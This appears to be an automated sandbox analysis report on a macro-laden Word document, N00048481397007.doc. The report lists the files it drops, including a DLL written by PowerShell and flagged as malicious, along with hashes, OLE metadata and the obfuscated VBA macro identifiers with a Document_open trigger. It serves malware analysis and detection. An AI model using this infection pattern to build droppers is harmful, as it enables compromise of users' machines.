                                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                          Malicious:false
                                                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{ED51AD77-1C4D-48D3-B650-0535282218FE}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1536
                                                                          Entropy (8bit):1.3586208805849453
                                                                          Encrypted:false
                                                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbs:IiiiiiiiiifdLloZQc8++lsJe1Mzn/n
                                                                          MD5:6585ADE50CD55CBC464CE5F3A7B43B6F
                                                                          SHA1:E76CAE8F5BFC88E2B831998CD93FB4504ED8306B
                                                                          SHA-256:696F31987A387841508A11DEF6FF6D9B64BFA58F9C789BD9906FB8C5CFE6AC6F
                                                                          SHA-512:D7EA21C9EC16DF67A6129228A18C2419D0B0D6C80697BF8F0B5FB4C6528FEEBA04D6A28B7B6AC790D63FBE099292F2A886FB0DB25B151A40E80C312ECD674694
                                                                          Malicious:false
                                                                          Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Local\Temp\Cab148B.tmp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                          Category:dropped
                                                                          Size (bytes):58936
                                                                          Entropy (8bit):7.994797855729196
                                                                          Encrypted:true
                                                                          SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                          MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                          SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                          SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                          SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                          Malicious:false
                                                                          Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                          C:\Users\user\AppData\Local\Temp\Tar148C.tmp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):152533
                                                                          Entropy (8bit):6.31602258454967
                                                                          Encrypted:false
                                                                          SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                          MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                          SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                          SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                          SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                          Malicious:false
                                                                          Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\N00048481397007.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Tue Jan 26 03:10:39 2021, length=143360, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2078
                                                                          Entropy (8bit):4.490249812476519
                                                                          Encrypted:false
                                                                          SSDEEP:48:8Wn/XT0jFKIJnCfQh2Wn/XT0jFKIJnCfQ/:8G/XojFKIBCfQh2G/XojFKIBCfQ/
                                                                          MD5:8D9E0A48A4AAE30E16217F595DB95584
                                                                          SHA1:6573476790AD3CB528004804EBE2D0E2456D1C5B
                                                                          SHA-256:E8169A5348C96CDB111384513B37F512EA047E525F1CE5691765C4E5EEB93654
                                                                          SHA-512:A21962D98C389753960E6D8E5EA0622AB0E2DE7FEFB886ECF66FFC2C2C981723FE207FDDBF448E59A1F553EE562D0A9CA12011B6ECCB262F7D0DA3EE9D19C2D9
                                                                          Malicious:false
                                                                          Preview: L..................F.... .....e..{....e..{.....4.....0...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2..0..:RT! .N00048~1.DOC..T.......Q.y.Q.y*...8.....................N.0.0.0.4.8.4.8.1.3.9.7.0.0.7...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\585948\Users.user\Desktop\N00048481397007.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.0.0.0.4.8.4.8.1.3.9.7.0.0.7...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......585948..........D_....3N...W...9F.C.........
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):83
                                                                          Entropy (8bit):3.9220124011386437
                                                                          Encrypted:false
                                                                          SSDEEP:3:M1BMWcmGUz/uWcmGUmX1BMWcmGUv:MAumEg
                                                                          MD5:9177EA48FE0784FEE174EA5A993CB67D
                                                                          SHA1:E16A37EFB21A72B380AECB88FEDF16CCA6D2D212
                                                                          SHA-256:E2AD03A823781A81F8F3BC613947C8F8065A4E4CC4EB08431CE74839F35DEC93
                                                                          SHA-512:7CBCB55B15FF3CF9C05BF225A7C6291F82F1E7AB0DF3F77DA89A273CC7B2DD98E43A99C727F5D02B8BFD19C786B4072154C92F4AAAD2B74683D357CB25FB974D
                                                                          Malicious:false
                                                                          Preview: [doc]..N00048481397007.LNK=0..N00048481397007.LNK=0..[doc]..N00048481397007.LNK=0..
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.4311600611816426
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVyCKb0OHlMwBim1ilfln:vdsCkWtPA08/+l
                                                                          MD5:F3E6EBAC97D4DEF04C645869D96DC090
                                                                          SHA1:F6ADEED4922A5BEFAEC456E3F1BA1C3D424C0F60
                                                                          SHA-256:67DC32FE6B29E78D53027D0ABF9458FFC4CD1054A1A060EB96655C2449B5B728
                                                                          SHA-512:B6379D87B5913A8087BC0012F0AAFD9C742984C21680AAD112E7D749738A83BA04191293A05B28BF149E99ACF20AD3AD1D018715FEB4ABECA8EB0ED6252B5970
                                                                          Malicious:false
                                                                          Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0ATCH18MFTYSDMR3EQ34.temp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.5917627193164106
                                                                          Encrypted:false
                                                                          SSDEEP:96:chQCsMqaqvsqvJCwoBz8hQCsMqaqvsEHyqvJCwor/zv1YXHyf8OElUVLIu:cyzoBz8ynHnor/zvdf8ObIu
                                                                          MD5:97BB13A27E3A3741A9E2F9E6F89C011B
                                                                          SHA1:385C35683D61CD43D772A54242259C464935D369
                                                                          SHA-256:B5D75980D08CC1134676659462A765AA87FB98A2C7570ED9C7D967E3DA430CDD
                                                                          SHA-512:7AB6F29944B8DAFE807FC22B4410D20AA983D5679FA6C8D889479161E4AB0255B9DDF3B620D0320172F121B4C509E4CEF5B2F85FCB8D3C1319FE9E103AB32F76
                                                                          Malicious:false
                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                          C:\Users\user\Desktop\~$0048481397007.doc
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.4311600611816426
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVyCKb0OHlMwBim1ilfln:vdsCkWtPA08/+l
                                                                          MD5:F3E6EBAC97D4DEF04C645869D96DC090
                                                                          SHA1:F6ADEED4922A5BEFAEC456E3F1BA1C3D424C0F60
                                                                          SHA-256:67DC32FE6B29E78D53027D0ABF9458FFC4CD1054A1A060EB96655C2449B5B728
                                                                          SHA-512:B6379D87B5913A8087BC0012F0AAFD9C742984C21680AAD112E7D749738A83BA04191293A05B28BF149E99ACF20AD3AD1D018715FEB4ABECA8EB0ED6252B5970
                                                                          Malicious:false
                                                                          Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                                          C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:modified
                                                                          Size (bytes):624128
                                                                          Entropy (8bit):6.903924307081851
                                                                          Encrypted:false
                                                                          SSDEEP:12288:4YzchQVZnkmt/70MWugxPJZFpf0c1pHVbdJxUR9rNXZL4:L4KV5Hpt8bZHLrnM919
                                                                          MD5:DB0C9F047AC2BD305BD1EA3C2D072DA6
                                                                          SHA1:2D295892DFD00E5F00E60EE122923920938EC20A
                                                                          SHA-256:017EFC765BBC8BE0CE3512BB0707E9C8122BC38553FDB64134B66560D6B40DAB
                                                                          SHA-512:EE0B8F0DD9305C469C85A759B1F83605780C73FBC6D2F6570E4D2684B97CE7CF3C81359BB13F0867195AB1A655337165BD0325184825E4914AD8073FE947A021
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...R.......>.......@....@..........................................................................p..."...............................n..................................................................................CODE.............0.................. ..`DATA.........@.......4..............@...BSS..........`.......J...................idata..."...p...$...J..............@....reloc...n.......p...n..............@..P.rsrc...............................@..P....................................@..P........................................................................................................................................................................................................................

                                                                          Static File Info

                                                                          General

                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Non sed natus asperiores. Ipsum magnam fuga a atque animi sint laboriosam est aspernatur. Ut cupiditate quia., Author: Gabriel Villaseor, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 08:47:00 2021, Last Saved Time/Date: Mon Jan 25 08:47:00 2021, Number of Pages: 1, Number of Words: 5614, Number of Characters: 32003, Security: 8
                                                                          Entropy (8bit):6.195212513334959
                                                                          TrID:
                                                                          • Microsoft Word document (32009/1) 79.99%
                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                                          File name:N00048481397007.doc
                                                                          File size:142848
                                                                          MD5:ad7db0f946bc5c3bb051cb04f359e6a4
                                                                          SHA1:24d54a6a1c4280b948fb245c97e4823d319eefe1
                                                                          SHA256:4fc6cbe4fae599ca6ab094dc1115909a687754f49a3ff31671ae4fbc7b3296d1
                                                                          SHA512:a4b34893134f12724a7fd951d552cf1c3dc2f2bb488506a3ed5e4a94b687e09881a0fe50e25af4de7f41274e8cba539169cda651c95f0c7f4b55d5aa5de6def4
                                                                          SSDEEP:1536:KNpHZTgQSz4w4K0vOYOcc2bqrQFfDngtWBj:y1gQSU3K0hzqrQFbKWBj
                                                                          File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                          File Icon

                                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                                          Static OLE Info

                                                                          General

                                                                          Document Type:OLE
                                                                          Number of OLE Files:1

                                                                          OLE File "N00048481397007.doc"

                                                                          Indicators

                                                                          Has Summary Info:True
                                                                          Application Name:Microsoft Office Word
                                                                          Encrypted Document:False
                                                                          Contains Word Document Stream:True
                                                                          Contains Workbook/Book Stream:False
                                                                          Contains PowerPoint Document Stream:False
                                                                          Contains Visio Document Stream:False
                                                                          Contains ObjectPool Stream:
                                                                          Flash Objects Count:
                                                                          Contains VBA Macros:True

                                                                          Summary

                                                                          Code Page:1252
                                                                          Title:Non sed natus asperiores. Ipsum magnam fuga a atque animi sint laboriosam est aspernatur. Ut cupiditate quia.
                                                                          Subject:
                                                                          Author:Gabriel Villaseor
                                                                          Keywords:
                                                                          Comments:
                                                                          Template:
                                                                          Last Saved By:
                                                                          Revion Number:1
                                                                          Total Edit Time:0
                                                                          Create Time:2021-01-25 08:47:00
                                                                          Last Saved Time:2021-01-25 08:47:00
                                                                          Number of Pages:1
                                                                          Number of Words:5614
                                                                          Number of Characters:32003
                                                                          Creating Application:Microsoft Office Word
                                                                          Security:8

                                                                          Document Summary

                                                                          Document Code Page:-535
                                                                          Number of Lines:266
                                                                          Number of Paragraphs:75
                                                                          Thumbnail Scaling Desired:False
                                                                          Company:Velzquez - Rodrquez
                                                                          Contains Dirty Links:False
                                                                          Shared Document:False
                                                                          Changed Hyperlinks:False
                                                                          Application Version:917504

                                                                          Streams with VBA

                                                                          VBA File Name: Gp0t5ucwnkng7fi, Stream Size: 14586
                                                                          General
                                                                          Stream Path:Macros/VBA/Gp0t5ucwnkng7fi
                                                                          VBA File Name:Gp0t5ucwnkng7fi
                                                                          Stream Size:14586
                                                                          Data ASCII:. . . . . . . . . d . . . . . . . . . . . . . . . l . . . . , . . . . . . . . . . < . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                          Data Raw:01 16 01 00 00 f0 00 00 00 64 10 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 6c 10 00 00 1c 2c 00 00 00 00 00 00 01 00 00 00 3c 11 59 83 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                          VBA Code Keywords

                                                                          Keyword
                                                                          YXgZLBuTI
                                                                          Const
                                                                          LFmsHlGJO
                                                                          xMeNBMA
                                                                          Error
                                                                          huzCVaAnM
                                                                          ybkwIF
                                                                          mFRDA:
                                                                          HzpNhFB)
                                                                          LXmiCH
                                                                          Split(uwcdCFcFJ,
                                                                          ndrons
                                                                          jqLUKf
                                                                          UrnhFG
                                                                          dtPsGEOG
                                                                          nUxeKfi
                                                                          Resume
                                                                          SdueDATuJ
                                                                          buaHCHyIN
                                                                          VlJBAxsF)
                                                                          rlKxF
                                                                          snBUla:
                                                                          ZcbWFy
                                                                          MvCNCxeRC
                                                                          Split(VVDiBADws,
                                                                          uUNTnPDJ:
                                                                          QNBiBDJF)
                                                                          cskzymBH
                                                                          Array((rlKxF),
                                                                          Split(UupSwG,
                                                                          snBUla
                                                                          XDCYoHErU:
                                                                          KJKIF
                                                                          mFRDA
                                                                          QFCSIz
                                                                          mxkikw
                                                                          CtnVB
                                                                          Array((TYMfJE),
                                                                          eRlxboGG
                                                                          "ndpns
                                                                          wbcoCJA
                                                                          pqwm,
                                                                          vMqQFsCmr
                                                                          NxyDdD
                                                                          jmprxcAGG
                                                                          SRadpEcF)
                                                                          Split(AEpDpJGH,
                                                                          ZhuxR
                                                                          QNBiBDJF
                                                                          Array((bTSPCh),
                                                                          aEMwHJJ()
                                                                          xcFaA()
                                                                          UupSwG
                                                                          vmuBOT()
                                                                          PDgjIDCIF
                                                                          wbcoCJA)
                                                                          Range:
                                                                          DReLBGD
                                                                          "*high*,*critic*"
                                                                          Array((mQUInscCB),
                                                                          YYiqHCrBJ
                                                                          bwTdFGH
                                                                          dtPsGEOG:
                                                                          ppqanE)
                                                                          LJgRGnI()
                                                                          rnfVw()
                                                                          VVDiBADws
                                                                          HzpNhFB
                                                                          mjbBYHhbs
                                                                          aEMwHJJ
                                                                          uQDVbE)
                                                                          Split(LYEtDJDB,
                                                                          TYMfJE
                                                                          BZLGJ
                                                                          AeZXCL
                                                                          yqmFHJvF
                                                                          SOBiDVBG
                                                                          FCnAjUBF:
                                                                          rQMlbCDj()
                                                                          PmHbFtBA
                                                                          XxDunFI:
                                                                          Array((uFHXMGsDH),
                                                                          Array((UrnhFG),
                                                                          zgEErH
                                                                          TziQbRH
                                                                          Array((SdueDATuJ),
                                                                          wAZjcaDbE
                                                                          yifdCzUX
                                                                          Nothing
                                                                          Array((vQbVHTJ),
                                                                          Split(buaHCHyIN,
                                                                          FCnAjUBF
                                                                          ppqanE
                                                                          QFCSIz()
                                                                          zPYsAGBC
                                                                          wPuUI
                                                                          Split(TfZstIBWb,
                                                                          Split(TQutDNlhF,
                                                                          FwMLnnSxs
                                                                          gPxXF
                                                                          nmoAspl
                                                                          IUtVX
                                                                          uFHXMGsDH
                                                                          AeZXCL)
                                                                          LJgRGnI
                                                                          yVlwI
                                                                          vmuBOT
                                                                          Split(NxyDdD,
                                                                          nd:wns
                                                                          yVlwI()
                                                                          xdoxB:
                                                                          Array((SOBiDVBG),
                                                                          BBnudDV)
                                                                          kTIuCnPI
                                                                          Split(IcBqyoTE,
                                                                          Array((JNPIBwzJy),
                                                                          bTSPCh
                                                                          ZtlVi
                                                                          DJesE:
                                                                          upIoDlhH
                                                                          AnoeDGEY
                                                                          Array((rwAdJC),
                                                                          GKCGI:
                                                                          ndgmns
                                                                          nQutDRr
                                                                          nmoAspl)
                                                                          GyemVIEQ
                                                                          Array((ZcbWFy),
                                                                          String
                                                                          XfKDE
                                                                          zPYsAGBC:
                                                                          Split(DReLBGD,
                                                                          ndinns
                                                                          DpdIEHHc
                                                                          LYEtDJDB
                                                                          TziQbRH)
                                                                          cCNkM
                                                                          XxDunFI
                                                                          IfvyDH
                                                                          Array((AjzpdH),
                                                                          jEGWECK()
                                                                          Mid(skuwd,
                                                                          Target)
                                                                          jqLUKf()
                                                                          MNzdmO
                                                                          jEGWECK
                                                                          Split(yqmFHJvF,
                                                                          KDRcGw()
                                                                          JNPIBwzJy
                                                                          MtSXGFAwF
                                                                          kTIuCnPI()
                                                                          xcFaA
                                                                          mbdQXnNAJ
                                                                          OQtflfHc
                                                                          XDCYoHErU
                                                                          Split(mbdQXnNAJ,
                                                                          eRlxboGG:
                                                                          cCNkM:
                                                                          ndtns
                                                                          Len(skuwd))
                                                                          uUNTnPDJ
                                                                          Array((upIoDlhH),
                                                                          PmHbFtBA)
                                                                          Array((wPuUI),
                                                                          dmJpUJBT
                                                                          eJIkEagfC
                                                                          AjzpdH
                                                                          jmprxcAGG)
                                                                          OtpOArK
                                                                          VZXgAzj:
                                                                          EZSQT
                                                                          Split(ybkwIF,
                                                                          PDgjIDCIF:
                                                                          ndmns
                                                                          uwcdCFcFJ
                                                                          Attribute
                                                                          zImEIFI
                                                                          GKCGI
                                                                          HfUXFJwF
                                                                          Split(MtSXGFAwF,
                                                                          Array((LFmsHlGJO),
                                                                          Nkemmqfhxex
                                                                          OQtflfHc:
                                                                          LcJWChpF
                                                                          ndsns
                                                                          xdoxB
                                                                          GhFhH
                                                                          OAFQFBEFa()
                                                                          eFfcEAI
                                                                          vMqQFsCmr)
                                                                          OAFQFBEFa
                                                                          mQUInscCB
                                                                          xJhvfW
                                                                          Mid(Application.Name,
                                                                          ENgVDEnDI
                                                                          jbkkjHHCd
                                                                          VB_Name
                                                                          xJhvfW)
                                                                          Content
                                                                          xMeNBMA()
                                                                          QttEc
                                                                          TmgVHr
                                                                          BZLGJ)
                                                                          mbLvUI)
                                                                          SRadpEcF
                                                                          Function
                                                                          uHhldyVW
                                                                          Split(AnoeDGEY,
                                                                          Split(LXmiCH,
                                                                          auKzIlBI()
                                                                          BBnudDV
                                                                          qJJnPFoNQ
                                                                          AEpDpJGH
                                                                          zzXfBb
                                                                          bwTdFGH:
                                                                          Split(XfKDE,
                                                                          zImEIFI:
                                                                          UTUqCwyI
                                                                          rwAdJC
                                                                          rQMlbCDj
                                                                          cskzymBH:
                                                                          Array((QttEc),
                                                                          KDRcGw
                                                                          DJesE
                                                                          nd_ns
                                                                          rnfVw
                                                                          uQDVbE
                                                                          IcBqyoTE
                                                                          sInuFuLII
                                                                          Array((vXvXQH),
                                                                          LgSUu()
                                                                          iJkmJG
                                                                          Array((gPxXF),
                                                                          LcJWChpF:
                                                                          VlJBAxsF
                                                                          jKGrEhAE
                                                                          MNzdmO()
                                                                          mbLvUI
                                                                          jKGrEhAE()
                                                                          vQbVHTJ
                                                                          TQutDNlhF
                                                                          auKzIlBI
                                                                          wAZjcaDbE)
                                                                          LgSUu
                                                                          Split(zzXfBb,
                                                                          sInuFuLII)
                                                                          VZXgAzj
                                                                          Split(iJkmJG,
                                                                          TmgVHr()
                                                                          jbkkjHHCd)
                                                                          vXvXQH
                                                                          dmJpUJBT:
                                                                          Split(DpdIEHHc,
                                                                          HfUXFJwF()
                                                                          String:
                                                                          Array((huzCVaAnM),
                                                                          Array((OtpOArK),
                                                                          qJJnPFoNQ()
                                                                          TfZstIBWb
                                                                          skuwd
                                                                          eJIkEagfC)
                                                                          VBA Code
                                                                          VBA File Name: Ht_h_pv5qq7taeoe3a, Stream Size: 705
                                                                          General
                                                                          Stream Path:Macros/VBA/Ht_h_pv5qq7taeoe3a
                                                                          VBA File Name:Ht_h_pv5qq7taeoe3a
                                                                          Stream Size:705
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                          Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 3c 11 fb 95 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                          VBA Code Keywords

                                                                          Keyword
                                                                          Attribute
                                                                          VB_Name
                                                                          VBA Code
                                                                          VBA File Name: U765y5vgf_ao0faq, Stream Size: 1173
                                                                          General
                                                                          Stream Path:Macros/VBA/U765y5vgf_ao0faq
                                                                          VBA File Name:U765y5vgf_ao0faq
                                                                          Stream Size:1173
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . n . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                          Data Raw:01 16 01 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 0b 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 3c 11 6e d2 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                          VBA Code Keywords

                                                                          Keyword
                                                                          False
                                                                          Private
                                                                          VB_Exposed
                                                                          Attribute
                                                                          VB_Name
                                                                          VB_Creatable
                                                                          Document_open()
                                                                          VB_PredeclaredId
                                                                          VB_GlobalNameSpace
                                                                          VB_Base
                                                                          VB_Customizable
                                                                          VB_TemplateDerived
                                                                          VBA Code

                                                                          Streams

                                                                          Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                                          General
                                                                          Stream Path:\x1CompObj
